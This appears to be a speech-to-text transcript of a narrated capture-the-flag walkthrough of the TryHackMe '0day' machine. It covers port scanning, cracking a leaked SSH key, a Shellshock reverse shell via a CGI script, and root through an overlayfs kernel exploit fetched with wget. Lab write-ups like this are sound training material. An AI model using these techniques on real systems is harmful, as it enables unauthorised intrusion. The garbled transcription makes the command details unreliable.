Alright, welcome. So today we're going to be doing 0 day on try-hack-me. And then we're going to start moving over to proving grounds and like CCNA stuff, things like that. So I already got my IP address here. Oh. Someone's mowing the lawn outside. Know anything about, one time my buddy texted me, know anything about virtual machines? Yes. But yeah, so we're going to go ahead and let's start this up. I'm going to ping this. And the box is up and running. Cool. Alright. And let's go ahead and start on this box like right here. So let's make a directory first for desktop. Try-hack-me. And this one's called 0 day. CD into there. How about SQL drivers? No. MySQL, yeah, but alright, cool. So we got into there, we can ping them, so let's go ahead and start up our MF scan, right? TAC-P TAC for all ports, right? TAC-PN for do not ping. TAC-VV, very verbose, timing of 4, 1 above the default, and no DNS lookup, right? So we'll go ahead and send that off. It looks like we got port 80 and a port 22 like right now. So we'll go ahead and work on those guys like right there. So we know there's a port 22. So let's start up our Python 3 dir search. Do our directory buster on this guy. And we'll also start up a nicto scan. Nicto. TAC URL. Boom. Alright, cool. And let's go ahead and check out that port 80. Oh, whoopsie daisy. There we go. So we'll go ahead and look at this and see what we got. So 0 day. Got nothing so far. We do have a /admin. Taking a second for that guy to do it, probably because nicto is running like right now and he takes a minute. So, or he takes a lot of that box. Probably like destroying it like right now. Not really getting very much with that website right now. We do have a /admin, /backup. We can try and check those out, see if it's going to get to those guys. Let's try /admin. Alright, well, it did pop up there for a second, and /admin looks like it goes nowhere. Okay, what about /backup? /backup. Okay, we have a private key, it looks like. Let's control U this, and it is encrypted. So let's go ahead and grab this guy right here, see if this is anything for us that we need to use. And let's try and get back to that website also, just that normal website, because it did finally load. And Ryan Montgomery, he's a penetration tester. Yeah, so he made this box and everything. Thank you very much. We do have CGI. That's a big one like right there, CGI. Especially with the hint it gives in the very beginning, because it does say, like a turtle and a hurricane. Alright, so there's a guy right there. And exploit Ubuntu like a turtle and a hurricane. And we have turtle, so I'm thinking, what's up Al, how you doing? So I'm thinking it's got to be something like shell shock. So let's go ahead and nano ID RSA. Throw that in there. Username is probably going to be Ryan or 0 day I would go with. I'm going to go with Ryan at first, but we do have that CGI bin, which is also something I want to check out. And maybe just start a something within there too. Like a Go Buster or something like that. Let's go ahead and see if we can do anything with this ID RSA. First thing we need to do is send that to John the Ripper, right? But we first need to utilize the ID RSA to something that John can actually read. So if we locate SSH to John, we can see that we have a user share John in there. So Python, just regular Python, user share John, SSH to John. And from there we're going to do, yep, so the key file, ID RSA, and we'll output that into something such as John RSA .hash. So if I do LSAC LA, I now have John RSA.hash, and John the Ripper can read that one. So go ahead and we'll try to look at that with John the Ripper. So let's do a John wordless rocky.txt, and we'll do John RSA.hash. Now he should be able to read it. Hopefully, okay, we got let me in. So let's go ahead and change mode to 600, ID RSA, and let's go ahead and throw that in there. That's going to be an SSH TAC ID RSA. Now we still don't have a username. I'm going to go with it's Ryan at that box number. and the password of let me in. Let me in, or my passphrase is let me in. Okay, then we get Ryan's password. I don't know, let me in. Let me in. And that did not work. Okay, that's alright. Nothing too big yet. Let's see here. We found a CGI, because this guy's popped up down here. We have found a CGI bin test CGI. And site appears vulnerable to shell shock. You may not be able to see that. Let me go ahead and stop this up here. Exit out of that. Now you can see it. And shell shock. So let's look up what is shell shock. Shell shock CGI. And let's change it over to English. And shell shock vulnerability. Alright, so and we can read this if you really want to. Let's first look up what is CGI. I think it stands for console graphic interface. Let's see here. What is CGI? What is CGI? There we go. Computer generated imagery. What is CGI? Computer generated imagery. So computer generated imagery. That's stood for console study, but computer generated imagery, and we're going to shell shock that. So CGI. What is CGI in Apache? Common Gateway Interface. There we go. Alright, defines a way a web server to interact with external content generated programs, which are often referred to as CGI programs or CGI scripts. So whenever I see that a box has CGI in it, I always like to run a Nyctoscan, and we get this cool little thing right here, and it says that that may be vulnerable to shell shock. So now what we really want to do is look at Apache 2.4.7 and see, is that vulnerable to shell shock, and if so, how do I actually do that shell shock, right? So let's go ahead and throw that guy in there. And we get a hello world. Alright, cool. So we know that does exist. And let's go ahead and see if we can do anything with that. Let's look up Apache 2.4.7 shell shock. Apache CGI shell shock remote code injection. This is exploit DB. So exploit DB, we know that means that there is a what is it? That's going to be a Metasploit module like right there. Let's try to do it without Metasploit first. Rapid7. We have something down here from Rapid7. And let's go ahead and also look up shell shock. Search exploit shell shock. Okay. Apache mod CGI. And there's a Python one like right there. So let's go ahead and grab that one. I don't know if this bash one's going to work. I don't know which one's going to work, but I'm going to try this guy first. So let's go ahead and search exploit attack-m, and let's go ahead and cat that 34900.py. See what we need here. So we got user bin Python. Looks like it's running on Python 2, shell shock Apache, mod CGI remote exploit usage, exploit.py, then a variable. So variables are rhost, rport, lhost, lport, pages, specific CGI page vulnerabilities, which was this guy right here, CGI, and then proxy if we have one. So let's go ahead and start that up. Let's do a Python 344, and we'll say, is it like rhost equals? rhost equals, and then we'll just put in that IP address and see if anything happens, see if it comes back with an error, something like that. This is like var equals rhost, comma. Okay, here we go. So example, payload equals whatever, payload reverse bind. Okay, so let's try something like that. So we'll do that. I just heard a whistle, but it might be one of the what is it? One of the lizards that we have. So we'll try. So we got this like right here. Payload equals reverse. Rhost equals that. Lhost equals what is my IP address, right? I have config 10.9.8.166. Okay. port equals 4444, and we'll listen. Start listening down here. 4444. Alright, and then we also want the URL, so we want pages equals the IP address, so the remote host / CGI bin test CGI. Hopefully this works like right here. Enter. Okay. File user bin. Address already in use. Huh. What address is already in use? Maybe I have to actually stop this down here. Trying to exploit? Okay, I do. So I can't have a listener listening like I would, you know. So it's gonna. I think it's just gonna make up its. Try to do its own listening port on here. Trying to exploit on there. Okay. Hopefully this this pulls through. We can do this one and show the Metasploit one, or we're probably just gonna move over to Metasploit and just show that one like right there. Still trying. While this guy's going, I'm about to get in the MSF console also. Trying to exploit on 10.10.225.242. 10.10.225.240. You know what? That's not correctly right there. The pages, obviously. HTTP. There we go. Let's try that. Ooh. And we got it. Alright, cool. So we're in. Alright, cool. Who am I? And we don't know who I am. Who am I? Not the best, not really getting the best, console here. But I mean, I am in. CD/root. Can I do that? CD into. Where can I go from here? Can I go like CD/home? Root permission denied. It seems like it's like a couple behind me. I'm just gonna keep hitting enter until it hopefully gets rid of everything. There we go. Okay, cool. Now let's go ahead and do an LSTech LA. I think I'm in home now. Okay, so we found a Ryan, and we also found a .secret. This .secret looks like he's going to root.txt. Probably not too much I could do in there. All right, this guy's going to be a huge pain trying to upload limps, I feel like. Let's CD into Ryan first. And let's go ahead and cat that user.txt. Shell shock rocks. Yes, it does. So that shell shock obviously worked with the Python. So there you go. I'm 21 away from a badge. Now we could start to manually exploit this guy. Do like a uname attack A. All right. That's an old version of Ubuntu. A very old version. Could do cat etc cron tabs. Right. We could see what kind of SUID bits we can find. We could do a sudo tac L, see if we need a password for that. No TTY present. I wonder if we can do like a which Python and make this like nicer to type in. I wonder if we can do like a cat scripts full shell. I wonder if we can do this. I don't know. Can I do something like that? It looks a little bit better, I think. I think it does. Can I do a sudo tac L now? Sudo password for the, we don't know it. I don't know it. I don't know it. Alright. See how it's like a minute behind, it seems like. So there we go. Okay, so you have 3 incorrect password attempts. I don't know the password. So we don't know that one. So we can't do anything with that. Can we can't probably do like a sudo change over to Ryan or anything like that. We could always look up cat SUID bits. We do have an old version we know right now of Ubuntu on there. So we're going to try to do that, and we aren't allowed to do anything. So yeah, I'm going to go with uname TAC A. And we're going to try to figure out that old version of Linux Ubuntu. Let's go ahead and do a search exploit. Let's go ahead and stop this also. So we'll clear that out, and we'll do a search exploit. TAC search exploit for 3.13. We should be able to find Linux kernel 3.13. What do we got here? We have something. Can we do GCC on here? Compilation terminated. Okay, so it does have GCC on there, so we can compile something. We have a text file, we have C, and let me go ahead and I'm going to move this over a little bit more so I can try to read what these guys are. Linux kernel Ubuntu 3.13. We have an SGID privilege escalation. There's one for that kernel. We also have a overlay local privilege escalation. Let's try. What is uname showing us? Uname is showing us that we have generic Ubuntu on there, 3.13, Linux kernel 3.13. So we can always try something like this, like right here. Overlay SS, local privilege escalations. Let's go ahead and grab this guy first. We're just going to go ahead and grab this guy. I don't know which one to use. Let's go ahead and search exploit, TAC-M, that guy right there. And let's go ahead and see what he's doing. Let's cat that 37 whatever .c, or see how to actually, you know, GCC this guy, compile this guy appropriately. Rename TAC A. Not really seeing those exact things like right there, but you know, close enough. GCC, okay. So they want us to change it to that ID. So the ID, okay. Boom, boom. We just thread's done. So this one also just changing the group bits also. I mean, that's what it seems like it's doing. Let's go ahead and throw that into this machine over here. Hopefully we can do like a wget. Do we have wget on here? Okay, cool, we do. So let's go ahead and do get a Python going up here, a Python server. Python TAC-M simple server. We'll do a wget http 10.98.166, and this one was called this, like right here, 8888/that, and it looks like you got it. Okay, cannot write there. Let's go with CD. Let's CD and a temp. Okay, and we'll do the same exact thing. Just come up here. We'll just copy exactly what I wrote down before. Coming back down, Control-Shift-V, and it got it again. Okay, now permissions should not be denied this time, and it wasn't. So let's go ahead and do a change mode. Actually, we want to do a GCC with that guy first. Go and cat him again. See what we're supposed to do that with. Might have to move him or whatever, change the name of it or whatever. So let's go ahead and move 37292.c to ofs.c. Alright. And now he is ofs.c. Alright, now we want to do a GCC. Pretty much copy this exact thing like right here. So we want to compile that. There, try to execute CC1, no such file directory. Okay. So it has no such file directory. Let's go ahead and try to run it. Oh. Error. Trying to execute CC1 excvp, no such file or directory. What is that? Well, you know what? That's okay. That is okay, because what we can do, we'll compile it back here and bring it over to him. So we'll do a GCC. We'll do the same exact thing right here. So let's go ahead and move that guy, just like we did over there. So we'll move the C drive into ofs.c, and we'll do that same exact thing. We'll do that GCC right over here. A lot of warnings, but it did work. There's our OFS. So now what we can do is a wget http 10.98.166.8888/OFS. because we'll just compile it over here, move it on over there, and that looked like it took. Stack LA. We do have an OFS. Let's go ahead and change mode to make that executable. Okay, and let's go ahead and period/OFS. Ooh, really? Maybe I cannot do this. Like right here. So when reading up on this guy, because I wanted to read up on Shell Shock 1. When reading up on him, I did see other people having this problem, and then sometimes they wouldn't have that problem. Other times they would. So the box may be broken, but let's go ahead and try to see what we can do with this. Let's go ahead and try to fix it. See what this means. Reinstall build essential. Try that. We can't do that because that is a sudo. Okay. We may have to put this guy in a Docker and things like that. I wonder if we can do like an apt install. Nope, not allowed to do that either. Well then, this may not work. I wonder if there's any easy fixes for it, where I don't have to be sudo. That's not going to help out at all. That's one way to not get privilege escalation. Just make it so it doesn't work. Wonder if we go through Metasploit. I don't see why we wouldn't have the same problem, but let's try to go through Metasploit and see if we still have, we should still have the same exact problem, the same exact thing. And I wonder if we can also, what is this, like a, no, because it's going to be a, that's not going to work, is it? What is that? An exploit? What is that? Okay. This is OFS lib.c too. Or if we need to compile something with that. Why do we have that? What is that OFS lib.c? How about say that time I didn't get the thing. Alright, let's go ahead and search for Shell Shock and see if we can find anything with this. Look for that link right there, right? Apache, right? So we can use that guy because it is Apache. The rest of them don't seem to really work with this, so let's go ahead and use use 5. Show options. Set our L host to ton 0. We'll set our R host to this guy right here. Set our URL. Alright, we got to set our path. to slash CGI bin, right? Test.cgi, right? Wasn't that it? Did we run that? Set target URI. Path CGI script, and what was this? rpath. Whoopsie daisy. Set rpath slash bin. Set target URI to that. And let's go ahead and run this guy. We'll see if that works. So that guy's going through. Okay, cool. Interpreter's opened up. Session. Let's go ahead and upload OFS, right? Or actually, let's go ahead and remove CD into /temp. So now let's tech LA. Okay, so we are in their temp. Let's go ahead and remove tech RF. I don't know what that is now either. I'm going to remove tech RF. That guy right there. Delete. Come on up here. Alright, cool. I don't know what the heck. This is now TNHWN. That was not there before, I don't think. That's really weird. Okay. Can I execute TNHWN? Okay, that's really weird. Alright, do another ls-tech-la. And we have, okay, I shoot this exploit also. Okay, that's super weird. Alright, let's go ahead and upload. What was it called again? It was called OFS. And let's go ahead and execute TechF OFS. We do a change mode. Plus X. Actually, let's do 777 for OFS. Now let's try to execute that again. So then every single time full form. Okay, let's go into a shell. We'll try to execute from there. Let's go ahead and do our cat our full shell. And now we are root. So that's really weird. It didn't work up here, but it worked down here. I also wonder if I can do a, let's go ahead and try it up here again. /OFS. So it's not working when I do it through the actual shell shop, but it's working when I do it through Metasploit. That's really weird to me. Might be something wrong. I don't know. But we are root now, so let's go ahead and cd /root. And let's go ahead and cat that root.text.